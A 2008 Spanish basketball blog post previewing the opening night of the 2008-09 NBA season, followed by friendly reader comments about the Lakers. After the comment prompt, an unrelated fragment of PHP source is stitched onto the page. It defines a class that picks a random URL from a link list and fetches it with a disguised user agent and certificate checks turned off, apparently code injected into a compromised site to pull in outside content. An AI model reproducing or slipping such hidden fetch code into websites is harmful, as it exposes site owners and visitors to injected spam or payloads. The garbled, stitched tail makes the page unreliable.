Are you ready!?

28 de October de 2008 por MagicJohnson32

¿Estáis preparados para vibrar con el mejor baloncesto del mundo? ¿Preparados para asistir a nuevas exhibiciones sobrehumanas de LeBron James, a la sinfonía laker con Kobe, Pau, Bynum y Odom, a la defensa del trono a cargo del auténtico Big Three? ¿Preparados para otro año impar a cargo de Duncan, Manu y Parker? ¿Preparados para los nuevos Suns y para los viejos Pistons? ¿Estáis preparados para Chris Paul? ¿Para Deron Williams? ¿Para los primeros pasos de los Blazers en el camino hacia la gloria y para los mejores Sixers desde 1983? ¿Preparados para la redención de Dirk, Josh & Jason, para unos Rockets con Artest, para el Superman de Orlando, para los Raptors de Bosh, Maine y Calde, para la continuación de la saga Gasol en Memphis? ¿Preparados para duelos tan espectaculares como un Cavs-Celtics o un Blazers-Lakers? Porque, si estáis preparados, no tendréis que esperar más que unas horas al inicio de la temporada 2008-2009 de la NBA.

Dejemos atrás las previsiones y los análisis. Esta noche, a la 1:00 de la madrugada, arranca la temporada 2008-2009 de la NBA con una reedición de las semifinales de Conferencia: la visita de Cleveland a Boston. LeBron, mejor acompañado que nunca, tratará de asaltar el fortín de los Celtics. Media hora más tarde, a la 1:30 horas, los rejuvenecidos Bulls reciben a los Bucks en un duelo entre dos de los equipos más decepcionantes del año pasado. Y a partir de las 3:30, con el Blazers-Lakers viviremos el debut de Rudy Fernández ante Pau Gasol y el primer enfrentamiento en la NBA entre los dos pívots del futuro, Andrew Bynum vs Greg Oden, por si no fuera poco con los Kobe, Roy, Odom, Aldridge y compañía.

Será, sin embargo, un pequeño aperitivo para una temporada que se presenta muy abierta, con muchos candidatos y la expectativa de una nueva final entre Lakers y Celtics, si es que Cavs, Spurs, Hornets y demás no lo evitan. En TJNBA haremos un seguimiento diario de la actualidad NBA, con lo más destacado de cada jornada, las principales noticias y rumores, análisis y opinión.

Nosotros estamos preparados ¿Y tú?

Comenta

7 comentarios a esta entrada

  1. landrusski dice:
    #1

    Oye tio llevo varios dias visitando este sitio nba y me encanta como escribis…espero ke cada dia actualizeis noticias,opinion etc etc como bien dices…este mensaje solo era para eso,para decir que sigais igual y gracias por toda la informacion.
    Por cierto este año los lakers se llevan el anillo desde mi humilde opinion

      Citar

  2. MagicJohnson32 dice:
    #2

    Muchísimas gracias por el comentario, Landrusski, de verdad que se agradecen los ánimos. Y espero leerte más por aquí. Cada día tendrás nuevos contenidos, pero de momento puedes ir opinando sobre las perspectivas de cada equipo en los 30 análisis que hemos publicado, o en nuestras votaciones sobre los premios individuales de la temporada.

    ¡Y a ver si es verdad y nos llevamos el anillo!

      Citar

  3. landrusski dice:
    #3

    claro magic por aqui escribire cada dia…ademas ya me lei los 30 analisis al completo…de verdad que sois unos fenomenos a la hora de escribir,y cada dia tendreis un lector desde aqui de madrid sin duda…un saludo muy grande magic y… !a por el anillo!jajjaja

      Citar

  4. Jabho dice:
    #4

    Espero y deseo que Landrusski se sume al blog. Entre todos lo haremos mas grande y mejor.

    Pero si alguna vez sumamos alguno que no sea amarillo tampoco iba a pasar nada :-(… 🙂

    No quiero, y no creo, que veamos anillo por California

      Citar

  5. landrusski dice:
    #5

    esque yo soy joven(18 añitos) y me enganche a la NBA por los lakers de kobe,shaq,fisher,fox and company jajajajaja…asi que si amarillo soy…y ahora mas con pau en el equipo y mi jugador favorito(kobe bryant)

      Citar

  6. Viru dice:
    #6

    aqui estaremos leyendo, a ver los partidos de esta noche.

      Citar

  7. univerzee dice:
    #7

    BUAFFFFFFFFFFFF que video!!! Sencillamente esplendido! felicidades por toda la currada de este blog. A todos!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>